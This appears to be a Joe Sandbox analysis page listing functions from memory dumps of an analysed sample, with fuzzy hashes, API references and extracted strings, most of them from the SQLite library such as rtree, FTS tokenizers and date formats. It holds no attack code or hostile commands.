Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b65ced6347d06dbe970e0e8504f92dce261118504d39433ebc94e7536f098ff3
Instruction ID: 24af98e627a5ba463ede9872fe50da00994ef6e9fc1c471f67a3a27550d888e2
Opcode Fuzzy Hash: b65ced6347d06dbe970e0e8504f92dce261118504d39433ebc94e7536f098ff3
Instruction Fuzzy Hash: 1F319EB5504701AFEB508F29DC84B2777F9EF84724F15482AF9468B261D771F850CB62

Function 1D7AE170 Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b08a3aaf8bf1a9ff2b8012a6c264b081eb5170c33ae149cd67c2931a75fdf8a
Instruction ID: 2e3fea072c5012b468455e40a75f777e1b53f8ab17367eec7e92eb8eca8cc5bc
Opcode Fuzzy Hash: 7b08a3aaf8bf1a9ff2b8012a6c264b081eb5170c33ae149cd67c2931a75fdf8a
Instruction Fuzzy Hash: 7911E7797042117BE7149B289C44F6B77AEEFC0765F090D18FA85D3291E632E911C7A3

Function 1D732112 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

GetEnabledXStateFeatures, xrefs: 1D910C61

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: GetEnabledXStateFeatures
API String ID: 0-1068256093
Opcode ID: 9d7da993b14afc806ad76a57a56d893e3e01ebcd937dcfaf3d698b38ff9820c3
Instruction ID: 8ec48805395f82bfd97c8e2c7afd2842d200afbff13d20452f83a08102a6926e
Opcode Fuzzy Hash: 9d7da993b14afc806ad76a57a56d893e3e01ebcd937dcfaf3d698b38ff9820c3
Instruction Fuzzy Hash: 55F0C83570513CB7DF133B60DC08BAE3A16AF81770F010025FE0C2A251DB3658118AC2

Function 1D914D7C Relevance: 1.7, APIs: 1, Instructions: 242timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,1D914F85,00000000,00000000,00000000), ref: 1D914DEE

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 36863b840b3fe95f6c42f7464d0e1aed5811de4f56267909143a4cada2a82141
Instruction ID: 585c2d443810e6c27f0e9ea837e24acfce45ce03387592aa3a09ded8110fbbaa
Opcode Fuzzy Hash: 36863b840b3fe95f6c42f7464d0e1aed5811de4f56267909143a4cada2a82141
Instruction Fuzzy Hash: 78412976904229BBCB15AF74DC85A9E7B78BF05270B124259E614EF2A0DB30AD00CFD2

Function 1D768CB0 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd720519f0502a74e6e1e516fbbe569aab1b8d7403c0a7ec9085219fb0d3575
Instruction ID: c051c4ead48f2ca158fe9db6207c7bf6943ebcc50aa682bc7765aa067590e73f
Opcode Fuzzy Hash: bcd720519f0502a74e6e1e516fbbe569aab1b8d7403c0a7ec9085219fb0d3575
Instruction Fuzzy Hash: C6019EF46141419BF715CF28E884A1A73E9BFA8264F15046BEA84D3391FA29E805CB73

Function 1D90FF17 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(1D90FF01,00000001,1D96D298,0000000C,1D910A92,?), ref: 1D90FF4F

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 4001d9781309c26d7aad51332f81ea48954eed7f92bdfcfb1fc583393c88fe12
Instruction ID: fc03125e58dc1c25e1f52150c688d41925eef5a65269698c4615c5770bf16746
Opcode Fuzzy Hash: 4001d9781309c26d7aad51332f81ea48954eed7f92bdfcfb1fc583393c88fe12
Instruction Fuzzy Hash: 3FF0497AA08214EFDB04DFA8E485B9D77B0FB4A365F10426AE514DB3A1C7795900CF41

Function 1D768430 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875602c2f73a52c0c9a6f148e04de174215d237d3759911a04e6fd69f05410ec
Instruction ID: ecb54fe6f1546b5db68d9acc2c48a3ffafd7cd4081423f552112543849eaedd8
Opcode Fuzzy Hash: 875602c2f73a52c0c9a6f148e04de174215d237d3759911a04e6fd69f05410ec
Instruction Fuzzy Hash: 7BB048B6408641BFAB41AA089C0087AB7BAFBC0220F848D48B9A440031D33298289A12

Function 1D7342AF Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 1D8D4A98

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ee65b1bb0741323167501787b16e944060e4fbce55ac73e3ad2cf55b830380c0
Instruction ID: a2ed48823b8a1ed81b628b637f83bf4afa73a4dbc3d880879d8c2b2e6ec93ca0
Opcode Fuzzy Hash: ee65b1bb0741323167501787b16e944060e4fbce55ac73e3ad2cf55b830380c0
Instruction Fuzzy Hash: 569002B4544616AA9F4596D9DE495A567306656A56B404170A00D64446552801018A37

Function 1D73433C Relevance: 1.4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

Strings

GetSystemTimePreciseAsFileTime, xrefs: 1D910CE9, 1D910CF3

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: GetSystemTimePreciseAsFileTime
API String ID: 0-595813830
Opcode ID: 0aa9b4dee67282f8868948c8082944bd889c18d14751ad9a956530ee5d0f773f
Instruction ID: bab96c1201d2d7b92bccfea33108921a43ea8dd99cb785bd09c70e9b85788f2f
Opcode Fuzzy Hash: 0aa9b4dee67282f8868948c8082944bd889c18d14751ad9a956530ee5d0f773f
Instruction Fuzzy Hash: 9A412634600305EFCB12DF54D884AAEBBF9FF45734B00895DE59A97252D731BA02CB92

Function 1D7346A6 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 1D90EFF3

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 99032344225efad0e2d3d5d1066beed28596d492c8006800e60ae54c42b64947
Instruction ID: c12e492f702fd61a867d82330ded65faa272728c20a42df62ea1def442f1e677
Opcode Fuzzy Hash: 99032344225efad0e2d3d5d1066beed28596d492c8006800e60ae54c42b64947
Instruction Fuzzy Hash: 3CB01230705221CFD3804F72454530E35BC7F1B5E0300C319D004C4240D63844404F13

Function 1D815660 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 452
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CREATE TABLE x(%.*s INT, xrefs: 1D8157CA
,%.*s, xrefs: 1D815804, 1D815835
Auxiliary rtree columns must be last, xrefs: 1D8156B3, 1D8158B3
_node, xrefs: 1D81579E

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: ,%.*s$Auxiliary rtree columns must be last$CREATE TABLE x(%.*s INT$_node
API String ID: 0-209218429
Opcode ID: 4580951cb685faf61d0366b8da0f47c5e70de13582a297ae2ebf0dfeb7197193
Instruction ID: 6e094edfa7f634011ae4a6d194e1d543bc8af58f2e9b639755e0dc6d7c5f6e4e
Opcode Fuzzy Hash: 4580951cb685faf61d0366b8da0f47c5e70de13582a297ae2ebf0dfeb7197193
Instruction Fuzzy Hash: 5BF1FF74508301AFC7008F24D884B6BB7F4AF45359F4905A9FA4A9B222D736F959CBB3

Function 1D75CC80 Relevance: 47.7, APIs: 15, Strings: 12, Instructions: 470COMMON

Download Yara Rule

Strings

%02d, xrefs: 1D75CE2C, 1D75CE34, 1D75CF27, 1D75CF6F, 1D75CFCE, 1D75CFE9, 1D75D10A
%2d, xrefs: 1D75CE27
%.16g, xrefs: 1D75CFB3
%.3f, xrefs: 1D75D0BF
%04d, xrefs: 1D75D1CE
%03d, xrefs: 1D75CF81, 1D75CF8B
%06.3f, xrefs: 1D75CE5F
%04d-%02d-%02d, xrefs: 1D75CE82
%lld, xrefs: 1D75D0EE
%02d:%02d, xrefs: 1D75D080
%02d:%02d:%02d, xrefs: 1D75D12E
u, xrefs: 1D75D16D

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %.16g$%.3f$%02d$%02d:%02d$%02d:%02d:%02d$%03d$%04d$%04d-%02d-%02d$%06.3f$%2d$%lld$u
API String ID: 0-1613945299
Opcode ID: b125deeefe5c1f93c8c28d1e87cf67a5f6ef6e671b57663cc886e7ffa3803deb
Instruction ID: 6ebb84378a4cfca72a047a848d3687f22f224ef6333e0a18d6ebd6df89994f5d
Opcode Fuzzy Hash: b125deeefe5c1f93c8c28d1e87cf67a5f6ef6e671b57663cc886e7ffa3803deb
Instruction Fuzzy Hash: CFF136B190C301ABD301CB28DC44F6BB3EABF89324F458A1DF98497252EB35E9458753

Function 1D7D9120 Relevance: 45.9, APIs: 23, Strings: 3, Instructions: 355COMMON

Download Yara Rule

Strings

CREATE TABLE x(_shape, xrefs: 1D7D9268
_node, xrefs: 1D7D9202
,%s, xrefs: 1D7D9297

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: ,%s$CREATE TABLE x(_shape$_node
API String ID: 0-1242591684
Opcode ID: 7cd980e2297c69705a5306e4e4fea89315a958c57c89219faf6ec0ff94f35b5c
Instruction ID: 6a2b08f96e91e9be555ac583b257fe2ab3ede6c00072de2afc8528c07b8145e8
Opcode Fuzzy Hash: 7cd980e2297c69705a5306e4e4fea89315a958c57c89219faf6ec0ff94f35b5c
Instruction Fuzzy Hash: BEC12275508701ABC7009F28DCC8B2777B9FF41369F054229EA4A97262EB36F514CBA3

Function 1D88B050 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 251COMMON

Download Yara Rule

Strings

program, xrefs: 1D88B2FB
,%s%s%s, xrefs: 1D88B137
%.16g, xrefs: 1D88B217
(blob), xrefs: 1D88B26C
vtab:%p, xrefs: 1D88B283
%.18s-%s, xrefs: 1D88B192
NULL, xrefs: 1D88B267, 1D88B324, 1D88B325
%lld, xrefs: 1D88B1DA, 1D88B24C
%c%u, xrefs: 1D88B2C3
k(%d, xrefs: 1D88B0A5
%s(%d), xrefs: 1D88B1B3
BINARY, xrefs: 1D88B0D3

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: %.16g$%.18s-%s$%c%u$%lld$%s(%d)$(blob)$,%s%s%s$BINARY$NULL$k(%d$program$vtab:%p
API String ID: 0-900822179
Opcode ID: 6984a8ba0e088b1c2e90321e96a86995ba9124e82653c8fdf32d74bb720b02d1
Instruction ID: ecad45d1720d25f4a667e525c691c3b4e94b2e4f16f654c6c8ca95a1c1e6e2ac
Opcode Fuzzy Hash: 6984a8ba0e088b1c2e90321e96a86995ba9124e82653c8fdf32d74bb720b02d1
Instruction Fuzzy Hash: 3E91EF709083469BCB01CF54D894BAB77E5BFC5708F55899CF9888F263D722E90687A3

Function 1D74D820 Relevance: 35.2, APIs: 8, Strings: 12, Instructions: 223COMMON

Download Yara Rule

Strings

fts3tokenize, xrefs: 1D74DA27
snippet, xrefs: 1D74D93C
matchinfo, xrefs: 1D74D970, 1D74D98A
optimize, xrefs: 1D74D9A4
offsets, xrefs: 1D74D956
porter, xrefs: 1D74D8EE
fts4, xrefs: 1D74D9F0
fts3, xrefs: 1D74D9CA
simple, xrefs: 1D74D8A9
fts3_tokenizer, xrefs: 1D74D921
fts4aux, xrefs: 1D74D840
unicode61, xrefs: 1D74D90B

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D738000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D93D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D93F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427916682.000000001D948000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427941441.000000001D972000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427946769.000000001D97F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1d730000_kat2B07.jbxd

Similarity

API ID:
String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
API String ID: 0-449611708
Opcode ID: 8106a218278168f200e5b07eb32b578a6ef390dc1876e3bba7da8b51d16190d2
Instruction ID: 99c9cd2fbb6179d205e95987a6d3f48b3f1276cc8346f2eaa2b97ecacdf5b7ab
Opcode Fuzzy Hash: 8106a218278168f200e5b07eb32b578a6ef390dc1876e3bba7da8b51d16190d2
Instruction Fuzzy Hash: A0513D70B09311B7D7115A6CECC4F7B36A86F41679F158139FE88A3243E768F91582A3

Function 1D8C7FB0 Relevance: 33.6, APIs: 14, Strings: 5, Instructions: 342COMMON

Download Yara Rule

Strings

winGetTempname1, xrefs: 1D8C817B
winGetTempname2, xrefs: 1D8C8094
winGetTempname4, xrefs: 1D8C8355
winGetTempname5, xrefs: 1D8C8233
etilqs_, xrefs: 1D8C824C

Memory Dump Source

Source File: 00000002.00000002.427702996.000000001D896000.00000020.00001000.00020000.00000000.sdmp, Offset: 1D730000, based on PE: true

Associated: 00000002.00000002.427699106.000000001D730000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.427702996.000000001D731000.00000020.00001000.00020000.00000000.sdmpDownload File
